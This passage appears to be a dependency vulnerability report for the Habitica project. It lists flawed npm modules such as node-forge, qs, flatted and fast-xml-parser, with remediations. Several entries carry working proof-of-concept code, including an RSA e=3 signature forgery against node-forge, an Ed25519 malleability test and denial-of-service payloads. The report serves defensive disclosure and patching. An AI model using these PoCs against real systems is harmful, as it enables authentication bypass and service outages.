From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. In these extreme situations the engine works very slowly (the time grows exponentially with input size, as shown above), which an attacker can exploit to make the service consume excessive CPU, resulting in a Denial of Service.
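The growth shown in the table can be observed directly in Node. A small illustrative sketch (the input lengths are arbitrary; absolute timings vary by machine):

```javascript
// Time the vulnerable pattern against failing inputs of increasing length.
// Each additional 'C' roughly doubles the backtracking work.
const pattern = /A(B|C+)+D/;

for (const n of [18, 20, 22]) {
  const input = 'A' + 'C'.repeat(n) + 'X'; // trailing 'X' forces a failed match
  const start = process.hrtime.bigint();
  const matched = pattern.test(input);
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  console.log(`n=${n} matched=${matched} elapsed=${elapsedMs.toFixed(1)}ms`);
}
```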
Remediation
Upgrade cross-spawn to version 6.0.6, 7.0.5 or higher.
References
high severity
new
- Vulnerable module: fast-xml-parser
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-svgo@7.1.0 › is-svg@4.4.0 › fast-xml-parser@4.5.6
Overview
fast-xml-parser is a package to validate, parse, and build XML without C/C++-based libraries.
Affected versions of this package are vulnerable to XML Entity Expansion in the replaceEntitiesValue() function, which does not guard against unlimited expansion of numeric entities the way it guards DOCTYPE data (as described and fixed for CVE-2026-26278). An attacker can exhaust system memory and CPU resources by submitting XML input containing a large number of numeric character references - &#NNN; and &#xHH;.
Note: This is a bypass for the fix to the DOCTYPE expansion vulnerability in 5.3.6.
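While waiting to upgrade, input can be screened before it reaches the parser. A defense-in-depth sketch (countNumericEntities and the limit are illustrative helpers, not part of fast-xml-parser's API):

```javascript
// Count decimal (&#NNN;) and hex (&#xHH;) numeric character references,
// so oversized inputs can be rejected before they reach the XML parser.
function countNumericEntities(xml) {
  const matches = xml.match(/&#(?:x[0-9a-fA-F]+|[0-9]+);/g);
  return matches ? matches.length : 0;
}

const MAX_ENTITIES = 1000; // illustrative limit; tune for your payload sizes

function assertSafeEntityCount(xml) {
  if (countNumericEntities(xml) > MAX_ENTITIES) {
    throw new Error('too many numeric character references');
  }
}

console.log(countNumericEntities('<a>&#65;&#x41;</a>')); // 2
```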
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by exploiting a flaw either in the application code or in an open source library it uses.
Two common types of DoS vulnerabilities:
- High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
- Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.
Remediation
Upgrade fast-xml-parser to version 5.5.6 or higher.
References
high severity
new
- Vulnerable module: flatted
- Introduced through: eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0 › file-entry-cache@5.0.1 › flat-cache@2.0.1 › flatted@2.0.2
Overview
Affected versions of this package are vulnerable to Uncontrolled Recursion via the parse function due to using a recursive revive() phase to resolve circular references in deserialized JSON. An attacker can cause a stack overflow and crash the process by supplying a crafted payload with deeply nested or self-referential indices.
PoC
const flatted = require('flatted');

// Build a deeply nested reference chain: entry i points at entry i + 1.
const depth = 20000;
const arr = new Array(depth + 1);
arr[0] = '{"a":"1"}';
for (let i = 1; i <= depth; i++) {
  arr[i] = `{"a":"${i + 1}"}`;
}
arr[depth] = '{"a":"leaf"}';

// Join the entries as raw JSON so each element stays an object;
// JSON.stringify(arr) would re-escape them into plain strings.
const payload = '[' + arr.join(',') + ']';

flatted.parse(payload); // RangeError: Maximum call stack size exceeded
Remediation
Upgrade flatted to version 3.4.0 or higher.
References
high severity
- Vulnerable module: minimatch
- Introduced through: gulp.spritesmith@6.13.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › minimatch@3.0.8
Overview
minimatch is a minimal matching utility.
Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity via the matchOne function. An attacker can cause significant delays in processing and stall the event loop by supplying specially crafted glob patterns containing multiple non-adjacent GLOBSTAR segments.
Remediation
Upgrade minimatch to version 3.1.3, 4.2.5, 5.1.8, 6.2.2, 7.4.8, 8.0.6, 9.0.7, 10.2.3 or higher.
References
high severity
- Vulnerable module: minimatch
- Introduced through: gulp.spritesmith@6.13.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › minimatch@3.0.8
Overview
minimatch is a minimal matching utility.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the AST class, caused by catastrophic backtracking when an input string contains many * characters in a row, followed by an unmatched character.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
- A - The string must start with the letter 'A'.
- (B|C+)+ - The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
- D - Finally, we ensure this section of the string ends with a 'D'.
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
In most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30-character-long string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. In these extreme situations the engine works very slowly (the time grows exponentially with input size, as shown above), which an attacker can exploit to make the service consume excessive CPU, resulting in a Denial of Service.
Remediation
Upgrade minimatch to version 3.1.3, 4.2.4, 5.1.7, 6.2.1, 7.4.7, 8.0.5, 9.0.6, 10.2.1 or higher.
References
high severity
new
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1
Remediation: Upgrade to @parse/node-apn@8.0.0.
Overview
node-forge is a JavaScript implementation of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in the ed25519.verify function. An attacker can bypass authentication and authorization logic by submitting forged non-canonical signatures where the scalar S is not properly validated, allowing acceptance of signatures that should be rejected according to the specification.
PoC
#!/usr/bin/env node
'use strict';

const path = require('path');
const crypto = require('crypto');
const forge = require('./forge');

const ed = forge.ed25519;
const MESSAGE = Buffer.from('dderpym is the coolest man alive!');

// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).
const ED25519_ORDER_L = Buffer.from([
  0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
  0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,
]);

// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.
// This returns a new signature with s := s + L (mod 2^256), plus the carry.
function addLToS(signature) {
  if (!Buffer.isBuffer(signature) || signature.length !== 64) {
    throw new Error('signature must be a 64-byte Buffer');
  }
  const out = Buffer.from(signature);
  let carry = 0;
  for (let i = 0; i < 32; i++) {
    const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.
    const sum = out[idx] + ED25519_ORDER_L[i] + carry;
    out[idx] = sum & 0xff;
    carry = sum >> 8;
  }
  return { sig: out, carry };
}

function toSpkiPem(publicKeyBytes) {
  if (publicKeyBytes.length !== 32) {
    throw new Error('publicKeyBytes must be 32 bytes');
  }
  // Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.
  const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);
  const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);
  const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);
  const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);
  const b64 = spki.toString('base64').match(/.{1,64}/g).join('\n');
  return `-----BEGIN PUBLIC KEY-----\n${b64}\n-----END PUBLIC KEY-----\n`;
}

function verifyWithCrypto(publicKey, message, signature) {
  try {
    const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));
    const ok = crypto.verify(null, message, keyObject, signature);
    return { ok };
  } catch (error) {
    return { ok: false, error: error.message };
  }
}

function toResult(label, original, tweaked) {
  return {
    [label]: {
      original_valid: original.ok,
      tweaked_valid: tweaked.ok,
    },
  };
}

function main() {
  const kp = ed.generateKeyPair();
  const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });
  const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });

  const tweaked = addLToS(sig);
  const okTweaked = ed.verify({
    message: MESSAGE,
    signature: tweaked.sig,
    publicKey: kp.publicKey,
  });

  const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);
  const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);

  const result = {
    ...toResult('forge', { ok }, { ok: okTweaked }),
    ...toResult('crypto', cryptoOriginal, cryptoTweaked),
  };
  console.log(JSON.stringify(result, null, 2));
}

main();
Remediation
Upgrade node-forge to version 1.4.0 or higher.
References
high severity
new
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1
Remediation: Upgrade to @parse/node-apn@8.0.0.
Overview
node-forge is a JavaScript implementation of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in ASN.1 structures during RSA signature verification. An attacker can bypass signature verification and inject forged signatures by crafting ASN.1 data with extra fields or insufficient padding, allowing unauthorized actions or data integrity violations.
Note:
This is only exploitable if the default verification scheme (RSASSA-PKCS1-v1_5) is used with the _parseAllDigestBytes: true setting (which is the default).
PoC
#!/usr/bin/env node
'use strict';

const crypto = require('crypto');
const forge = require('./forge/lib/index');

// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:
// SEQUENCE {
//   SEQUENCE { OID sha256, NULL },
//   OCTET STRING <32-byte digest>
// }
// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20
const DIGESTINFO_SHA256_PREFIX = Buffer.from(
  '300d060960864801650304020105000420',
  'hex'
);

const toBig = b => BigInt('0x' + (b.toString('hex') || '0'));

function toBuf(n, len) {
  let h = n.toString(16);
  if (h.length % 2) h = '0' + h;
  const b = Buffer.from(h, 'hex');
  return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;
}

function cbrtFloor(n) {
  let lo = 0n;
  let hi = 1n;
  while (hi * hi * hi <= n) hi <<= 1n;
  while (lo + 1n < hi) {
    const mid = (lo + hi) >> 1n;
    if (mid * mid * mid <= n) lo = mid;
    else hi = mid;
  }
  return lo;
}

const cbrtCeil = n => {
  const f = cbrtFloor(n);
  return f * f * f === n ? f : f + 1n;
};

function derLen(len) {
  if (len < 0x80) return Buffer.from([len]);
  if (len <= 0xff) return Buffer.from([0x81, len]);
  return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);
}

function forgeStrictVerify(publicPem, msg, sig) {
  const key = forge.pki.publicKeyFromPem(publicPem);
  const md = forge.md.sha256.create();
  md.update(msg.toString('utf8'), 'utf8');
  try {
    // verify(digestBytes, signatureBytes, scheme, options):
    //   - digestBytes: raw SHA-256 digest bytes for `msg`
    //   - signatureBytes: binary-string representation of the candidate signature
    //   - scheme: undefined => default RSASSA-PKCS1-v1_5
    //   - options._parseAllDigestBytes: require DER parser to consume all bytes
    //     (this is forge's default for verify; set explicitly here for clarity)
    return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };
  } catch (err) {
    return { ok: false, err: err.message };
  }
}

function main() {
  const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 4096,
    publicExponent: 3,
    privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
    publicKeyEncoding: { type: 'pkcs1', format: 'pem' }
  });
  const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });
  const nBytes = Buffer.from(jwk.n, 'base64url');
  const n = toBig(nBytes);
  const e = toBig(Buffer.from(jwk.e, 'base64url'));
  if (e !== 3n) throw new Error('expected e=3');

  const msg = Buffer.from('forged-message-0', 'utf8');
  const digest = crypto.createHash('sha256').update(msg).digest();
  const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);

  // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.
  const k = nBytes.length;

  // ffCount can be set to any value at or below 111 and produce a valid signature.
  // ffCount should be rejected for values below 8, since that would constitute a
  // malformed PKCS1 package. However, current versions of node-forge do not check
  // for this. Acceptance of packages with less than 8 bytes of padding is bad but
  // does not constitute a vulnerability by itself.
  const ffCount = 0;

  // `garbageLen` affects DER length field sizes, which in turn affect how many
  // bytes remain for garbage. Iterate to a fixed point so total EM size is
  // exactly `k`. A small cap (8) is enough here: DER length-size transitions are
  // discrete and few (<128, <=255, <=65535, ...), so this stabilizes quickly.
  let garbageLen = 0;
  for (let i = 0; i < 8; i += 1) {
    const gLenEnc = derLen(garbageLen).length;
    const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;
    const seqLenEnc = derLen(seqLen).length;
    const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;
    const next = k - fixed;
    if (next === garbageLen) break;
    garbageLen = next;
  }

  const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;
  const prefix = Buffer.concat([
    Buffer.from([0x00, 0x01]),
    Buffer.alloc(ffCount, 0xff),
    Buffer.from([0x00]),
    Buffer.from([0x30]), derLen(seqLen),
    algAndDigest,
    Buffer.from([0x04]), derLen(garbageLen)
  ]);

  // Build the numeric interval of all EM values that start with `prefix`:
  //   - `low`  = prefix || 00..00
  //   - `high` = one past (prefix || ff..ff)
  // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.
  const suffixLen = k - prefix.length;
  const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));
  const high = low + (1n << BigInt(8 * suffixLen));
  const s = cbrtCeil(low);
  if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');
  const sig = toBuf(s, k);

  const controlMsg = Buffer.from('control-message', 'utf8');
  const controlSig = crypto.sign('sha256', controlMsg, {
    key: privateKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  });

  // forge verification calls (library under test)
  const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);
  const forgedForge = forgeStrictVerify(publicKey, msg, sig);

  // Node.js verification calls (OpenSSL-backed reference behavior)
  const controlNode = crypto.verify('sha256', controlMsg, {
    key: publicKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  }, controlSig);
  const forgedNode = crypto.verify('sha256', msg, {
    key: publicKey,
    padding: crypto.constants.RSA_PKCS1_PADDING
  }, sig);

  console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');
  console.log('control-node:', controlNode);
  console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');
  console.log('forgery (node/OpenSSL):', forgedNode);
}

main();
Remediation
Upgrade node-forge to version 1.4.0 or higher.
References
high severity
new
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1
Remediation: Upgrade to @parse/node-apn@8.0.0.
Overview
node-forge is a JavaScript implementation of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Infinite loop via the modInverse function. An attacker can cause the application to hang indefinitely and consume excessive CPU resources by supplying a zero value as input, resulting in an infinite loop.
PoC
'use strict';

const { spawnSync } = require('child_process');

const childCode = `
  const forge = require('node-forge');
  // jsbn may not be auto-loaded; try explicit require if needed
  if (!forge.jsbn) {
    try { require('node-forge/lib/jsbn'); } catch (e) {}
  }
  if (!forge.jsbn || !forge.jsbn.BigInteger) {
    console.error('ERROR: forge.jsbn.BigInteger not available');
    process.exit(2);
  }
  const BigInteger = forge.jsbn.BigInteger;
  const zero = new BigInteger('0', 10);
  const mod = new BigInteger('3', 10);
  // This call should throw or return 0, but instead loops forever
  const inv = zero.modInverse(mod);
  console.log('returned: ' + inv.toString());
`;

console.log('[*] Testing: BigInteger(0).modInverse(3)');
console.log('[*] Expected: throw an error or return quickly');
console.log('[*] Spawning child process with 5s timeout...');
console.log();

const result = spawnSync(process.execPath, ['-e', childCode], {
  encoding: 'utf8',
  timeout: 5000,
});

if (result.error && result.error.code === 'ETIMEDOUT') {
  console.log('[VULNERABLE] Child process timed out after 5s');
  console.log('  -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');
  process.exit(0);
}
if (result.status === 2) {
  console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());
  console.log('  -> Check your node-forge installation');
  process.exit(1);
}
if (result.status === 0) {
  console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());
  process.exit(1);
}
console.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');
if (result.stderr) console.log('  stderr:', result.stderr.trim());
process.exit(1);
Remediation
Upgrade node-forge to version 1.4.0 or higher.
References
high severity
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1
Remediation: Upgrade to @parse/node-apn@7.0.0.
Overview
node-forge is a JavaScript implementation of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Uncontrolled Recursion via the fromDer function in asn1.js, which lacks a recursion depth limit. An attacker can cause stack exhaustion and disrupt service availability by submitting specially crafted, deeply nested DER-encoded ASN.1 data.
Remediation
Upgrade node-forge to version 1.3.2 or higher.
References
high severity
- Vulnerable module: qs
- Introduced through: amazon-payments@0.2.9, in-app-purchase@1.11.4 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › request@2.88.2 › qs@6.5.5
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › request@2.88.0 › qs@6.5.5
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › spritesmith@3.5.1 › pixelsmith@2.6.0 › get-pixels@3.3.3 › request@2.88.2 › qs@6.5.5
Overview
qs is a querystring parser that supports nesting and arrays, with a depth limit.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via improper enforcement of the arrayLimit option in bracket notation parsing. An attacker can exhaust server memory and cause application unavailability by submitting a large number of bracket notation parameters - like a[]=1&a[]=2 - in a single HTTP request.
PoC
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
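As an interim mitigation, the parsed result can be capped after the fact, independent of whether the parser honored arrayLimit. A sketch (capArrays is a hypothetical helper, not part of qs):

```javascript
// Recursively truncate every array in a parsed query object to `limit`
// entries, as defense in depth against parsers that ignore arrayLimit.
function capArrays(value, limit) {
  if (Array.isArray(value)) {
    return value.slice(0, limit).map((v) => capArrays(v, limit));
  }
  if (value !== null && typeof value === 'object') {
    const out = {};
    for (const key of Object.keys(value)) {
      out[key] = capArrays(value[key], limit);
    }
    return out;
  }
  return value;
}

const parsed = { a: Array.from({ length: 10000 }, (_, i) => i) };
console.log(capArrays(parsed, 100).a.length); // 100
```

Note this only bounds memory held after parsing; the real fix is upgrading qs so the limit is enforced during the parse itself.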
Remediation
Upgrade qs to version 6.14.1 or higher.
References
high severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0
Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function, which does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence, leading to improper string length calculation. An application using isLength for input validation may therefore accept strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial of service.
PoC
Input:
const validator = require('validator');
console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 3? ${validator.isLength('test', { max: 3 })}`);
console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 4? ${validator.isLength('test', { max: 4 })}`);
console.log(`Is "test\uFE0F\uFE0F\uFE0F\uFE0F" (String.length: ${'test\uFE0F\uFE0F\uFE0F\uFE0F'.length}) length less than or equal to 4? ${validator.isLength('test\uFE0F\uFE0F\uFE0F\uFE0F', { max: 4 })}`);
Output:
Is "test" (String.length: 4) length less than or equal to 3? false
Is "test" (String.length: 4) length less than or equal to 4? true
Is "test️️️️" (String.length: 8) length less than or equal to 4? true
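Where the accepted length budget matters, one possible mitigation is to measure the string directly rather than relying on isLength(). A sketch using the built-in Intl.Segmenter (available in Node 16+; the helper name is illustrative):

```javascript
// Report both raw UTF-16 code units and user-perceived grapheme clusters,
// so variation selectors cannot inflate what a max-length check accepts.
function lengths(str) {
  const segmenter = new Intl.Segmenter('en', { granularity: 'grapheme' });
  return {
    codeUnits: str.length,
    graphemes: [...segmenter.segment(str)].length,
  };
}

console.log(lengths('test'));             // { codeUnits: 4, graphemes: 4 }
console.log(lengths('test\uFE0F\uFE0F')); // variation selectors add code units
```

Enforcing the limit on codeUnits rejects 'test\uFE0F\uFE0F' for a max of 4, which affected versions of isLength() accept.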
Remediation
Upgrade validator to version 13.15.22 or higher.
References
high severity
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is a pure JavaScript, W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to Prototype Pollution through the copy() function in dom.js. Exploiting this vulnerability is possible via the p variable.
DISPUTED: This vulnerability has been disputed by the maintainers of the package. Currently the only viable exploit that has been demonstrated pollutes the target object (rather than the global object, which is generally the case for Prototype Pollution vulnerabilities), and it is as yet unclear whether this limited attack vector exposes any vulnerability in the context of this package.
See the linked GitHub Issue for full details on the discussion around the legitimacy and potential revocation of this vulnerability.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
- Unsafe Object recursive merge
- Property definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows this high-level model:
merge (target, source)
  foreach property of source
    if property exists and is an object on both the target and the source
      merge(target[property], source[property])
    else
      target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty(), the condition that checks whether the property exists and is an object on both the target and the source passes, and the merge recurses with the target being the prototype of Object and the source being the object the attacker defined. Properties are then copied onto the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
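To make the model concrete, here is a deliberately vulnerable merge in plain JavaScript, shown only to illustrate the mechanism (it is not code from xmldom or any library named above):

```javascript
// Deliberately vulnerable recursive merge: following the "__proto__" key
// walks up the prototype chain, so attacker JSON reaches Object.prototype.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (target[key] && typeof target[key] === 'object' &&
        source[key] && typeof source[key] === 'object') {
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates "__proto__" as an ordinary own property of the payload.
const payload = JSON.parse('{"__proto__": {"polluted": true}}');
unsafeMerge({}, payload);
console.log({}.polluted); // true -- every object now inherits the property

delete Object.prototype.polluted; // clean up the pollution
```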
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
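A common guard for such path-based setters is to reject prototype-walking keys outright. A hypothetical safeSet sketch (not taken from any particular library):

```javascript
// Set obj at a dotted path, refusing keys that could walk the prototype chain.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeSet(obj, pathStr, value) {
  const keys = pathStr.split('.');
  if (keys.some((k) => FORBIDDEN_KEYS.has(k))) {
    throw new Error('refusing to set forbidden key in path: ' + pathStr);
  }
  let node = obj;
  for (const key of keys.slice(0, -1)) {
    if (typeof node[key] !== 'object' || node[key] === null) {
      node[key] = {}; // create missing intermediate objects
    }
    node = node[key];
  }
  node[keys[keys.length - 1]] = value;
  return obj;
}

console.log(safeSet({}, 'a.b', 1)); // { a: { b: 1 } }
```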
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
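The DoS row of the table above can be reproduced in a few lines; this sketch pollutes toString with a non-function value and shows an ordinary implicit string conversion failing:

```javascript
// Sketch: polluting Object.prototype.toString with a non-function value
// breaks implicit string conversion everywhere in the process.
Object.prototype.toString = 1; // simulated attacker pollution

let result;
try {
  result = 'id: ' + {}; // implicit ToPrimitive -> toString, no longer callable
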